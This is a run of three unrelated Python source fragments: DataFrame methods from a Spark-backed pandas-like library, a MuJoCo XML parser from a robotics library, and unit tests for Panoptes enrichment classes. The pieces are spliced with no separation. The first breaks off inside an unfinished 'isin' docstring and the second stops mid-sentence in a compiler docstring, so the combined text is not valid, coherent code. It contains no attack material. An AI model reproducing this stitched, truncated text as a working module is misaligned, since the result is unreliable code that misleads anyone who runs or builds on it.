sdf = self._sdf.fillna(value)
if inplace:
self._sdf = sdf
else:
return DataFrame(sdf, self._metadata.copy())
def head(self, n=5):
"""
Return the first `n` rows.
This function returns the first `n` rows for the object based
on position. It is useful for quickly testing if your object
has the right type of data in it.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
obj_head : same type as caller
The first `n` rows of the caller object.
Examples
--------
>>> df = ks.DataFrame({'animal':['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the first 5 lines
>>> df.head()
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
Viewing the first `n` lines (three in this case)
>>> df.head(3)
animal
0 alligator
1 bee
2 falcon
"""
return DataFrame(self._sdf.limit(n), self._metadata.copy())
@property
def columns(self):
"""The column labels of the DataFrame."""
return pd.Index(self._metadata.data_columns)
@columns.setter
def columns(self, names):
old_names = self._metadata.data_columns
if len(old_names) != len(names):
raise ValueError(
"Length mismatch: Expected axis has %d elements, new values have %d elements"
% (len(old_names), len(names)))
sdf = self._sdf.select(self._metadata.index_columns +
[self[old_name]._scol.alias(new_name)
for (old_name, new_name) in zip(old_names, names)])
self._sdf = sdf
self._metadata = self._metadata.copy(data_columns=names)
@property
def dtypes(self):
"""Return the dtypes in the DataFrame.
This returns a Series with the data type of each column. The result's index is the original
DataFrame's columns. Columns with mixed types are stored with the object dtype.
:return: :class:`pd.Series` The data type of each column.
Examples
--------
>>> df = ks.DataFrame({'a': list('abc'),
... 'b': list(range(1, 4)),
... 'c': np.arange(3, 6).astype('i1'),
... 'd': np.arange(4.0, 7.0, dtype='float64'),
... 'e': [True, False, True],
... 'f': pd.date_range('20130101', periods=3)},
... columns=['a', 'b', 'c', 'd', 'e', 'f'])
>>> df.dtypes
a object
b int64
c int8
d float64
e bool
f datetime64[ns]
dtype: object
"""
return pd.Series([self[col].dtype for col in self._metadata.data_columns],
index=self._metadata.data_columns)
def count(self):
"""
Count non-NA cells for each column.
The values `None`, `NaN` are considered NA.
Returns
-------
pandas.Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.shape: Number of DataFrame rows and columns (including NA
elements).
DataFrame.isna: Boolean same-sized DataFrame showing places of NA
elements.
Examples
--------
Constructing DataFrame from a dictionary:
>>> df = ks.DataFrame({"Person":
... ["John", "Myla", "Lewis", "John", "Myla"],
... "Age": [24., np.nan, 21., 33, 26],
... "Single": [False, True, True, True, False]},
... columns=["Person", "Age", "Single"])
>>> df
Person Age Single
0 John 24.0 False
1 Myla NaN True
2 Lewis 21.0 True
3 John 33.0 True
4 Myla 26.0 False
Notice the uncounted NA values:
>>> df.count()
Person 5
Age 4
Single 5
dtype: int64
"""
return self._reduce_for_stat_function(_Frame._count_expr)
def drop(self, labels=None, axis=1, columns: Union[str, List[str]] = None):
"""
Drop specified labels from columns.
Remove columns by specifying label names and axis=1 or columns.
When specifying both labels and columns, only labels will be dropped.
Removing rows is yet to be implemented.
Parameters
----------
labels : single label or list-like
Column labels to drop.
axis : {1 or 'columns'}, default 1
.. drop currently only works for axis=1 ('columns');
axis=0 is yet to be implemented.
columns : single label or list-like
Alternative to specifying axis (``labels, axis=1``
is equivalent to ``columns=labels``).
Returns
-------
dropped : DataFrame
See Also
--------
Series.dropna
Examples
--------
>>> df = ks.DataFrame({'x': [1, 2], 'y': [3, 4], 'z': [5, 6], 'w': [7, 8]},
... columns=['x', 'y', 'z', 'w'])
>>> df
x y z w
0 1 3 5 7
1 2 4 6 8
>>> df.drop('x', axis=1)
y z w
0 3 5 7
1 4 6 8
>>> df.drop(['y', 'z'], axis=1)
x w
0 1 7
1 2 8
>>> df.drop(columns=['y', 'z'])
x w
0 1 7
1 2 8
Notes
-----
Currently only axis = 1 is supported in this function,
axis = 0 is yet to be implemented.
"""
if labels is not None:
axis = self._validate_axis(axis)
if axis == 1:
return self.drop(columns=labels)
raise NotImplementedError("Drop currently only works for axis=1")
elif columns is not None:
if isinstance(columns, str):
columns = [columns]
sdf = self._sdf.drop(*columns)
metadata = self._metadata.copy(
data_columns=[column for column in self.columns if column not in columns]
)
return DataFrame(sdf, metadata)
else:
raise ValueError("Need to specify at least one of 'labels' or 'columns'")
def get(self, key, default=None):
"""
Get item from object for given key (DataFrame column, Panel slice,
etc.). Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : same type as items contained in object
Examples
--------
>>> df = ks.DataFrame({'x':range(3), 'y':['a','b','b'], 'z':['a','b','b']},
... columns=['x', 'y', 'z'])
>>> df
x y z
0 0 a a
1 1 b b
2 2 b b
>>> df.get('x')
0 0
1 1
2 2
Name: x, dtype: int64
>>> df.get(['x', 'y'])
x y
0 0 a
1 1 b
2 2 b
"""
try:
return self._pd_getitem(key)
except (KeyError, ValueError, IndexError):
return default
def sort_values(self, by, ascending=True, inplace=False, na_position='last'):
"""
Sort by the values along either axis.
Parameters
----------
by : str or list of str
ascending : bool or list of bool, default True
Sort ascending vs. descending. Specify list for multiple sort
orders. If this is a list of bools, must match the length of
the by.
inplace : bool, default False
if True, perform operation in-place
na_position : {'first', 'last'}, default 'last'
`first` puts NaNs at the beginning, `last` puts NaNs at the end
Returns
-------
sorted_obj : DataFrame
Examples
--------
>>> df = ks.DataFrame({
... 'col1': ['A', 'B', None, 'D', 'C'],
... 'col2': [2, 9, 8, 7, 4],
... 'col3': [0, 9, 4, 2, 3],
... },
... columns=['col1', 'col2', 'col3'])
>>> df
col1 col2 col3
0 A 2 0
1 B 9 9
2 None 8 4
3 D 7 2
4 C 4 3
Sort by col1
>>> df.sort_values(by=['col1'])
col1 col2 col3
0 A 2 0
1 B 9 9
4 C 4 3
3 D 7 2
2 None 8 4
Sort Descending
>>> df.sort_values(by='col1', ascending=False)
col1 col2 col3
3 D 7 2
4 C 4 3
1 B 9 9
0 A 2 0
2 None 8 4
Sort by multiple columns
>>> df = ks.DataFrame({
... 'col1': ['A', 'A', 'B', None, 'D', 'C'],
... 'col2': [2, 1, 9, 8, 7, 4],
... 'col3': [0, 1, 9, 4, 2, 3],
... },
... columns=['col1', 'col2', 'col3'])
>>> df.sort_values(by=['col1', 'col2'])
col1 col2 col3
1 A 1 1
0 A 2 0
2 B 9 9
5 C 4 3
4 D 7 2
3 None 8 4
"""
if isinstance(by, str):
by = [by]
if isinstance(ascending, bool):
ascending = [ascending] * len(by)
if len(ascending) != len(by):
raise ValueError('Length of ascending ({}) != length of by ({})'
.format(len(ascending), len(by)))
if na_position not in ('first', 'last'):
raise ValueError("invalid na_position: '{}'".format(na_position))
# Mapper: Get a spark column function for (ascending, na_position) combination
# Note that 'asc_nulls_first' and friends were added as of Spark 2.4, see SPARK-23847.
mapper = {
(True, 'first'): lambda x: Column(getattr(x._jc, "asc_nulls_first")()),
(True, 'last'): lambda x: Column(getattr(x._jc, "asc_nulls_last")()),
(False, 'first'): lambda x: Column(getattr(x._jc, "desc_nulls_first")()),
(False, 'last'): lambda x: Column(getattr(x._jc, "desc_nulls_last")()),
}
by = [mapper[(asc, na_position)](self[colname]._scol)
for colname, asc in zip(by, ascending)]
kdf = DataFrame(self._sdf.sort(*by), self._metadata.copy())
if inplace:
self._sdf = kdf._sdf
self._metadata = kdf._metadata
else:
return kdf
def isin(self, values):
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Define the MuJoCo parser/generator.
Notes:
- MuJoCo only accepts STL meshes
- MuJoCo can load PNG files for textures and heightmap.
References:
- MuJoCo overview: http://www.mujoco.org/book/index.html
- MuJoCo XML format: http://www.mujoco.org/book/XMLreference.html
"""
import os
import copy
import numpy as np
import xml.etree.ElementTree as ET
# import mesh converter (from .obj to .stl)
try:
import trimesh # https://pypi.org/project/trimesh/
from trimesh.exchange.export import export_mesh
# import pymesh # rapid prototyping platform focused on geometry processing
# doc: https://pymesh.readthedocs.io/en/latest/user_guide.html
import pyassimp # library to import and export various 3d-model-formats
# doc: http://www.assimp.org/index.php
# github: https://github.com/assimp/assimp
except ImportError as e:
raise ImportError(str(e) + "\nTry to install trimesh pyassimp: `pip install trimesh pyassimp`")
from pyrobolearn.utils.parsers.robots.world_parser import WorldParser
from pyrobolearn.utils.parsers.robots.data_structures import Simulator, World, Tree, Body, Joint, Inertial, \
Visual, Collision, Light, Floor
from pyrobolearn.utils.transformation import rotation_matrix_x, rotation_matrix_y, rotation_matrix_z, \
get_inverse_homogeneous
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, PyRoboLearn"
__credits__ = ["<NAME>"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
class MuJoCoParser(WorldParser):
r"""MuJoCo Parser and Generator
The MuJoCo parser and generator keeps track of two data structures:
1. The XML tree describing the world (such that we can generate an XML file or string from it).
2. The World data structure that we can pass to other generators to generate their corresponding world file.
Using this class, you can `parse` an XML file or XML string that will automatically generate the XML tree and
the `World` data structure. You can also build the tree from scratch by yourself using the provided methods.
However, note that with the latter approach, you will have to generate the `World` data structure by yourself if
you need it, by calling the `parse` method.
Example of a simple MuJoCo file from [1]:
<mujoco>
<worldbody>
<light diffuse=".5 .5 .5" pos="0 0 3" dir="0 0 -1"/>
<geom type="plane" size="1 1 0.1" rgba=".9 0 0 1"/>
<body pos="0 0 1">
<joint type="free"/>
<geom type="box" size=".1 .2 .3" rgba="0 .9 0 1"/>
</body>
</worldbody>
</mujoco>
Notes:
- MuJoCo only accepts STL meshes
- MuJoCo can load PNG files for textures and heightmap.
Parts of the documentation have been copied from [1, 2] for completeness.
References:
- [1] MuJoCo overview: http://www.mujoco.org/book/index.html
- [2] MuJoCo XML format: http://www.mujoco.org/book/XMLreference.html
"""
def __init__(self, filename=None):
"""
Initialize the MuJoCo parser and generator.
Args:
filename (str, None): path to the MuJoCo XML file.
"""
super().__init__(filename)
self.simulator = Simulator()
self.compiler = dict() # set options for the built-in parser and compiler
self.options = dict() # simulation options
# default values for the attributes when they are not specified
# {default_type (str): {attribute_name (str): attribute_value (str)}}
self.defaults = dict()
# assets (textures, meshes, etc)
# {asset_type (str): {attribute_name (str): attribute_value (str)}}
self.assets = dict()
# create root XML element
self.create_root("mujoco")
# add <compiler>
self.compiler_tag = self.add_element("compiler", self._root,
attributes={'coordinate': 'local', 'angle': 'radian'})
# add <size>
self.nconmax = 200 # increase this if necessary (this depends on how many models are loaded)
self.size_tag = self.add_element("size", self._root, attributes={"nconmax": str(self.nconmax)})
# add <option>
self.option_tag = self.add_element("option", self._root, attributes={"timestep": str(0.002)})
# add <worldbody>
self.worldbody = self.add_element("worldbody", parent_element=self.root)
# set some counters
self._world_cnt = 0
self._light_cnt = 0
self._tree_cnt = 0
self._body_cnt = 0
self._joint_cnt = 0
self._material_cnt = 0 # material/asset counter
# self._geom_cnt = 0
# self._site_cnt = 0
# save homogenous matrices (for later)
self._h_bodies, self._h_joints, self._h_visuals, self._h_collisions, self._h_inertials = {}, {}, {}, {}, {}
self._assets_tmp = set([])
self._mesh_dirname = ''
#################
# Utils methods #
#################
@staticmethod
def _convert_wxyz_to_xyzw(q):
"""Convert a quaternion in the (w,x,y,z) format to (x,y,z,w).
- Mujoco: (w,x,y,z)
- Bullet: (x,y,z,w)
"""
return np.roll(q, shift=-1)
@staticmethod
def _convert_xyzw_to_wxyz(q):
"""Convert a quaternion in the (x,y,z,w) format to (w,x,y,z).
- Mujoco: (w,x,y,z)
- Bullet: (x,y,z,w)
"""
return np.roll(q, shift=1)
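# Example (illustrative): the identity rotation is (w,x,y,z) = (1,0,0,0) in MuJoCo and
# (x,y,z,w) = (0,0,0,1) in Bullet, so
#   _convert_wxyz_to_xyzw([1., 0., 0., 0.]) -> array([0., 0., 0., 1.])
#   _convert_xyzw_to_wxyz([0., 0., 0., 1.]) -> array([1., 0., 0., 0.])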
##########
# Parser #
##########
def _get_orientation(self, attrib):
"""
Get the orientation based on the XML attributes.
Args:
attrib (dict): dictionary which contains 'quat', 'euler' (with possibly 'eulereq'), 'axiangle', 'xyaxes',
'zaxis'}.
Returns:
np.array[float[3,3]], np.array[float[3]], str, None: orientation.
"""
orientation = None
# quaternion
if attrib.get('quat') is not None:
quat = attrib.get('quat')
orientation = self._convert_wxyz_to_xyzw([float(q) for q in quat.split()])
# euler orientation
elif attrib.get('euler') is not None:
orientation = attrib.get('euler')
            if self.compiler.get('eulerseq', 'xyz') != "xyz":  # xyz = rpy
                eulerseq = self.compiler['eulerseq'].lower()
                orientation = [float(c) for c in orientation.split()]
                rot = np.identity(3)
                for letter, angle in zip(eulerseq, orientation):
                    # accumulate with a matrix product; element-wise `*=` would be incorrect here
                    if letter == 'x':
                        rot = rot.dot(rotation_matrix_x(angle))
                    elif letter == 'y':
                        rot = rot.dot(rotation_matrix_y(angle))
                    elif letter == 'z':
                        rot = rot.dot(rotation_matrix_z(angle))
                    else:
                        raise ValueError("Expecting the letter in 'eulerseq' to be {'x', 'y', 'z', 'X', 'Y', 'Z'}.")
                orientation = rot
# axis-angle
        # axis-angle
        elif attrib.get('axisangle') is not None:
            axisangle = [float(c) for c in attrib.get('axisangle').split()]
            orientation = (np.array(axisangle[:3]), axisangle[3])
# XY axes
elif attrib.get('xyaxes') is not None:
xyaxes = attrib.get('xyaxes')
xyaxes = np.array([float(c) for c in xyaxes.split()])
x = xyaxes[:3] / np.linalg.norm(xyaxes[:3])
y = xyaxes[3:] / np.linalg.norm(xyaxes[3:])
z = np.cross(x, y)
orientation = np.array([x, y, z]).T
# Z axis
        elif attrib.get('zaxis') is not None:
            z = np.array([float(c) for c in attrib.get('zaxis').split()])
            z = z / np.linalg.norm(z)
            z_ = np.array([0., 0., 1.])  # old z axis
            x = np.cross(z, z_)
            if np.linalg.norm(x) < 1e-8:  # z is (anti-)parallel to the old z axis; pick any orthogonal x
                x = np.array([1., 0., 0.])
            x = x / np.linalg.norm(x)  # normalize; the cross product is not unit length in general
            y = np.cross(z, x)  # already unit length, since z and x are orthonormal
            orientation = np.array([x, y, z]).T
return orientation
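    # A worked sketch of the 'xyaxes' branch above (the attribute value is an illustrative
    # assumption): xyaxes="0 1 0 -1 0 0" sets the body x axis to world y and the body y axis
    # to world -x, giving z = x cross y = world z, i.e. the matrix
    #   [[0, -1, 0],
    #    [1,  0, 0],
    #    [0,  0, 1]]
    # whose columns are the new x, y, z axes (a 90-degree rotation about z).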
@staticmethod
def _set_attribute(element, name, value):
"""
Set an attribute value to the given attribute name belonging to the given element.
"""
if hasattr(element, name):
setattr(element, name, value)
def parse(self, filename):
"""
Load and parse the given MuJoCo XML file.
Args:
filename (str, ET.Element): path to the MuJoCo XML file, or XML root element.
"""
if isinstance(filename, str):
# load and parse the XML file
tree_xml = ET.parse(filename)
# get the root
root = tree_xml.getroot()
elif isinstance(filename, ET.Element):
root = filename
else:
raise TypeError("Expecting the given 'filename' to be a string or an ET.Element, but got instead: "
"{}".format(type(filename)))
# check that the root is <mujoco>
if root.tag != 'mujoco':
raise RuntimeError("Expecting the first XML tag to be 'mujoco' but found instead: {}".format(root.tag))
# build the simulator data structure
self.simulator.name = root.attrib.get('model', 'simulator')
# parse compiler: This element is used to set options for the built-in parser and compiler. After parsing and
# compilation it no longer has any effect.
# compiler attributes: boundmass, boundinertia, settotalmass, balanceinertia, strippath, coordinate, angle,
# fitaabb, eulerseq, meshdir, texturedir, discardvisual, convexhull, userthread,
# fusestatic, inertiafromgeom, inertiagrouprange
self._parse_compiler(parent_tag=root)
# parse default: this is the default configuration when they are not specified
# default attribute: mesh, material, joint, geom, site, camera, light, pair, equality, tendon, general, motor,
# position, velocity, cylinder, muscle, custom
self._parse_default(parent_tag=root)
# parse options
self._parse_option(parent_tag=root)
# parse assets: This is a grouping element for defining assets. Assets are created in the model so that they
# can be referenced from other model elements
# asset attributes: texture, hfield, mesh, skin, material
self._parse_asset(parent_tag=root)
# parse (world) body: This element is used to construct the kinematic tree via nesting. The element worldbody
# is used for the top-level body, while the element body is used for all other bodies.
# body attributes: name, childclass, mocap, pos, quat, axisangle, xyaxes, zaxis, euler
self._parse_worldbody(parent_tag=root, update_world_attribute=True)
# parse contact
# contact attributes: pair,
self._parse_contact(parent_tag=root)
# parse equality constraint
# equality attributes: connect, weld, joint, tendon, distance
self._parse_equality_constraint(parent_tag=root)
# parse actuator
# actuator attributes: general, motor, position, velocity, cylinder, muscle
self._parse_actuator(parent_tag=root)
# parse sensor
# sensor attributes: touch, accelerometer, velocimeter, gyro, force, torque, magnetometer, rangefinder,
# jointpos, jointvel, tendonpos, tendonvel, actuatorpos, actuatorvel, actuatorfrce,
# ballquat, ballangvel, jointlimitpos, jointlimitvel, jointlimitfrc, tendonlimitpos,
# tendonlimitvel, tendonlimitfrc, framepos, framequat, framexaxis, frameyaxis, framezaxis,
# framelinvel, frameangvel, framelinacc, frameangacc, subtreecom, subtreelinvel,
# subtreeangmom
self._parse_sensor(parent_tag=root)
def _parse_compiler(self, parent_tag):
"""
Parse the compiler tag if present, and update the `compiler` attribute of this class.
From the main documentation [2]: "This element is used to set options for the built-in parser and compiler.
After parsing and compilation it no longer has any effect. The settings here are global and apply to the
entire model.
Attributes:
        - boundmass (real, "0"): This attribute imposes a lower
"""
Copyright 2018, Oath Inc.
Licensed under the terms of the Apache 2.0 license. See LICENSE file in project root for terms.
"""
import time
import unittest
import json
import os
from mock import *
from yahoo_panoptes.framework.enrichment import PanoptesEnrichmentSet, PanoptesEnrichmentGroup, \
PanoptesEnrichmentGroupSet, PanoptesEnrichmentSchemaValidator, PanoptesEnrichmentEncoder, \
PanoptesEnrichmentMultiGroupSet
from yahoo_panoptes.framework.resources import PanoptesResource, PanoptesResourcesKeyValueStore
from yahoo_panoptes.enrichment.enrichment_plugin_agent import _store_enrichment_data, \
PanoptesEnrichmentCacheKeyValueStore, enrichment_plugin_task, PanoptesEnrichmentTaskContext
from tests.test_framework import PanoptesMockRedis
from yahoo_panoptes.framework.context import PanoptesContext
mock_time = Mock()
mock_time.return_value = 1512629517.03121
def ordered(obj):
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
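# A small sketch of what `ordered` buys us: dicts and lists are sorted recursively, so two
# JSON payloads that differ only in ordering compare equal, e.g.
#   ordered({'b': [2, 1], 'a': 0}) == ordered({'a': 0, 'b': [1, 2]})  # -> True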
def _get_test_conf_file():
my_dir = os.path.dirname(os.path.realpath(__file__))
panoptes_test_conf_file = os.path.join(my_dir, 'config_files/test_panoptes_config.ini')
return my_dir, panoptes_test_conf_file
class PanoptesEnrichmentInterfaceSchemaValidator(PanoptesEnrichmentSchemaValidator):
schema = {
'enrichment_label': {
'type': 'dict',
'schema': {
'speed': {'type': 'integer'},
'index': {'type': 'integer'},
'status': {'type': 'string'}
}
}
}
def __init__(self):
super(PanoptesEnrichmentInterfaceSchemaValidator, self).__init__()
class PanoptesEnrichmentNeighborSchemaValidator(PanoptesEnrichmentSchemaValidator):
schema = {
'enrichment_label': {
'type': 'dict',
'schema': {
'vlan_id': {'type': 'integer', 'required': True},
'property': {'type': 'string', 'required': True},
'mac': {'type': 'string'}
}
}
}
def __init__(self):
super(PanoptesEnrichmentNeighborSchemaValidator, self).__init__()
class TestEnrichmentFramework(unittest.TestCase):
@patch('yahoo_panoptes.framework.resources.time', mock_time)
def setUp(self):
self.__panoptes_resource = PanoptesResource(resource_site='test', resource_class='test',
resource_subclass='test',
resource_type='test', resource_id='test', resource_endpoint='test',
resource_plugin='test')
self.__panoptes_resource.add_metadata('test', 'test')
def test_enrichment_set(self):
enrichment_set = PanoptesEnrichmentSet('int_001')
enrichment_set.add('speed', 1000)
enrichment_set.add('index', 001)
enrichment_set.add('status', 'up')
self.assertEquals(enrichment_set.key, 'int_001')
self.assertDictEqual(enrichment_set.value, {'status': 'up', 'index': 1, 'speed': 1000})
self.assertEquals(len(enrichment_set), 3)
enrichment_set1 = PanoptesEnrichmentSet('int_002', {'status': 'down', 'index': 2, 'speed': 1000})
self.assertEquals(enrichment_set1.key, 'int_002')
self.assertDictEqual(enrichment_set1.value, {'status': 'down', 'index': 2, 'speed': 1000})
with self.assertRaises(AssertionError):
PanoptesEnrichmentSet('int_001', 'string')
with self.assertRaises(AssertionError):
PanoptesEnrichmentSet('int_001', 100)
def test_enrichment_schema_validator(self):
validator = PanoptesEnrichmentInterfaceSchemaValidator()
enrichment_set = PanoptesEnrichmentSet('int_001')
enrichment_set.add('speed', 1000)
enrichment_set.add('index', 001)
enrichment_set.add('status', 'up')
self.assertTrue(validator.validate(enrichment_set))
enrichment_set.add('status', 01)
self.assertFalse(validator.validate(enrichment_set))
@patch('time.time', mock_time)
def test_enrichment_group(self):
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
interface_data = \
'''{"data": [
{"int_001": {"index": 1, "speed": 1000, "status": "up"}},
{"int_002": {"index": 2, "speed": 1000, "status": "down"}}],
"metadata": {"_enrichment_group_creation_timestamp": %f, "_enrichment_ttl": 300, "_execute_frequency": 60},
"namespace": "interface"}''' % mock_time.return_value
neighbor_data = \
'''{"data": [{"host_name": {"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property", "vlan_id": 501}}],
"metadata": {"_enrichment_group_creation_timestamp": %f, "_enrichment_ttl": 600, "_execute_frequency": 120},
"namespace": "neighbor"}''' % mock_time.return_value
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup(1, interface_validation_object, 300, 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', 'non_validation_object', 300, 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, '300', 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 300, '60')
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 0, 60)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 0)
with self.assertRaises(AssertionError):
PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60).\
add_enrichment_set('not_PanoptesEnrichmentSet_obj')
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_group1.add_enrichment_set(enrichment_set2)
self.assertEqual(enrichment_group1.namespace, 'interface')
self.assertEqual(enrichment_group1.enrichment_ttl, 300)
self.assertEqual(enrichment_group1.execute_frequency, 60)
self.assertEqual(enrichment_group1.enrichment_group_creation_timestamp, mock_time.return_value)
self.assertEqual(ordered(json.loads(json.dumps(enrichment_group1.data, cls=PanoptesEnrichmentEncoder))),
ordered(json.loads(interface_data)['data']))
self.assertEqual(ordered(json.loads(enrichment_group1.json())), ordered(json.loads(interface_data)))
self.assertEquals(len(enrichment_group1), 2)
enrichment_set3 = PanoptesEnrichmentSet('int_002')
enrichment_set3.add('speed', 1000)
enrichment_set3.add('index', 002)
enrichment_set3.add('status', 'down')
self.assertEqual(ordered(json.loads(enrichment_group1.json())), ordered(json.loads(interface_data)))
self.assertEqual(ordered(enrichment_group1.metadata), ordered(json.loads(interface_data)['metadata']))
self.assertEquals(len(enrichment_group1), 2)
test_metadata = json.loads(interface_data)['metadata']
test_metadata['metadata_key'] = 'metadata_value'
enrichment_group1.upsert_metadata('metadata_key', 'metadata_value')
self.assertEqual(ordered(enrichment_group1.metadata), ordered(test_metadata))
enrichment_group1.upsert_metadata('ttl', 300)
with self.assertRaises(ValueError):
enrichment_group1.upsert_metadata('_enrichment_ttl', 300)
with self.assertRaises(AssertionError):
enrichment_group1.upsert_metadata('metadata', {})
with self.assertRaises(AssertionError):
enrichment_group1.upsert_metadata('metadata', [])
enrichment_set4 = PanoptesEnrichmentSet('host_name')
enrichment_set4.add('vlan_id', 501)
enrichment_set4.add('property', 'Test Property')
enrichment_set4.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set4)
self.assertEqual(ordered(json.loads(enrichment_group2.json())), ordered(json.loads(neighbor_data)))
self.assertEquals(len(enrichment_group2), 1)
enrichment_set5 = PanoptesEnrichmentSet('host_name01')
enrichment_set5.add('vlan_id', 502)
enrichment_set5.add('property', 'Netops01.US')
enrichment_set6 = PanoptesEnrichmentSet('host_name02')
enrichment_set6.add('vlan_id', 503)
enrichment_set6.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group3 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group3.add_enrichment_set(enrichment_set5)
with self.assertRaises(AssertionError):
enrichment_group3.add_enrichment_set(enrichment_set6)
interface_store_data = '{"int_001": {"index": 1, "speed": 1000, "status": "up"}, ' \
'"int_002": {"index": 2, "speed": 1000, "status": "down"}}'
neighbor_store_data = '{"host_name": {"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property", "vlan_id": 501}}'
self.assertEquals(ordered(json.loads(enrichment_group1.serialize_data())),
ordered(json.loads(interface_store_data)))
self.assertEquals(ordered(json.loads(enrichment_group2.serialize_data())),
ordered(json.loads(neighbor_store_data)))
enrichment_group1.upsert_metadata('ttl', 300)
with self.assertRaises(ValueError):
enrichment_group1.upsert_metadata('_enrichment_ttl', 300)
interface_data_serialized = '''{{"data": {{"int_001": {{"index": 1, "speed": 1000, "status": "up"}},
"int_002": {{"index": 2, "speed": 1000, "status": "down"}}}}, "metadata":
{{"_enrichment_group_creation_timestamp": {:.5f}, "_enrichment_ttl": 300, "_execute_frequency": 60,
"metadata_key": "metadata_value", "ttl": 300}}}}'''.format(mock_time.return_value)
neighbor_data_serialized = '''{{"data": {{"host_name": {{"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property"
,"vlan_id": 501}}}}, "metadata": {{"_enrichment_group_creation_timestamp": {:.5f},
"_enrichment_ttl": 600, "_execute_frequency": 120}}}}'''.format(mock_time.return_value)
self.assertEquals(ordered(json.loads(enrichment_group1.serialize())),
ordered(json.loads(interface_data_serialized)))
self.assertEquals(ordered(json.loads(enrichment_group2.serialize())),
ordered(json.loads(neighbor_data_serialized)))
@patch('time.time', mock_time)
def test_enrichment_group_set(self):
interface_validation_object = PanoptesEnrichmentInterfaceSchemaValidator()
neighbor_validation_object = PanoptesEnrichmentNeighborSchemaValidator()
panoptes_resource = self.__panoptes_resource
enrichment_data = \
'''{{"enrichment": [{{"metadata": {{"_enrichment_group_creation_timestamp": {:.5f}, "_enrichment_ttl": 600,
"_execute_frequency": 120}}, "data": [{{"host_name":
{{"mac": "aa:bb:cc:dd:ee:ff", "property": "Test Property", "vlan_id": 501}}}}],
"namespace": "neighbor"}}, {{"metadata": {{"_enrichment_group_creation_timestamp": {:.5f},
"_enrichment_ttl": 300,
"_execute_frequency": 60}}, "data": [
{{"int_001": {{"index": 1, "speed": 1000, "status": "up"}}}}, {{"int_002": {{"index": 2, "speed": 1000,
"status": "down"}}}}], "namespace": "interface"}}],
"enrichment_group_set_creation_timestamp": {:.5f}, "resource": {{"resource_class": "test",
"resource_creation_timestamp": {:.5f}, "resource_endpoint": "test", "resource_id": "test",
"resource_metadata": {{"_resource_ttl": "604800", "test": "test"}}, "resource_plugin": "test",
"resource_site": "test",
"resource_subclass": "test", "resource_type": "test"}}}}'''.format(mock_time.return_value,
mock_time.return_value,
mock_time.return_value,
mock_time.return_value)
enrichment_set1 = PanoptesEnrichmentSet('int_001')
enrichment_set1.add('speed', 1000)
enrichment_set1.add('index', 001)
enrichment_set1.add('status', 'up')
enrichment_set2 = PanoptesEnrichmentSet('int_002')
enrichment_set2.add('speed', 1000)
enrichment_set2.add('index', 002)
enrichment_set2.add('status', 'down')
enrichment_group1 = PanoptesEnrichmentGroup('interface', interface_validation_object, 300, 60)
enrichment_group1.add_enrichment_set(enrichment_set1)
enrichment_group1.add_enrichment_set(enrichment_set2)
enrichment_set3 = PanoptesEnrichmentSet('host_name')
enrichment_set3.add('vlan_id', 501)
enrichment_set3.add('property', 'Test Property')
enrichment_set3.add('mac', 'aa:bb:cc:dd:ee:ff')
enrichment_group2 = PanoptesEnrichmentGroup('neighbor', neighbor_validation_object, 600, 120)
enrichment_group2.add_enrichment_set(enrichment_set3)
enrichment_group_set1 = PanoptesEnrichmentGroupSet(panoptes_resource)
enrichment_group_set1.add_enrichment_group(enrichment_group1)
enrichment_group_set1.add_enrichment_group(enrichment_group2)
self.assertEquals(len(enrichment_group_set1), 2)
group_set_repr = "PanoptesEnrichmentGroupSet[resource:" \
"plugin|test|site|test|class|test|subclass|test|type|test|id|test|endpoint|test," \
"enrichment_group_set_creation_timestamp:{},PanoptesEnrichmentGroup[namespace:" \
"interface,enrichment_ttl:300,execute_frequency:60,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[int_001[status:up,index:1,speed:1000]],PanoptesEnrichmentSet" \
"[int_002[status:down,index:2,speed:1000]]],PanoptesEnrichmentGroup[namespace:neighbor," \
"enrichment_ttl:600,execute_frequency:120,enrichment_group_creation_timestamp:{}," \
"PanoptesEnrichmentSet[host_name[mac:aa:bb:cc:dd:ee:ff,property:" \
"Test Property,vlan_id:501]]]]".format(mock_time.return_value,
mock_time.return_value,
mock_time.return_value)
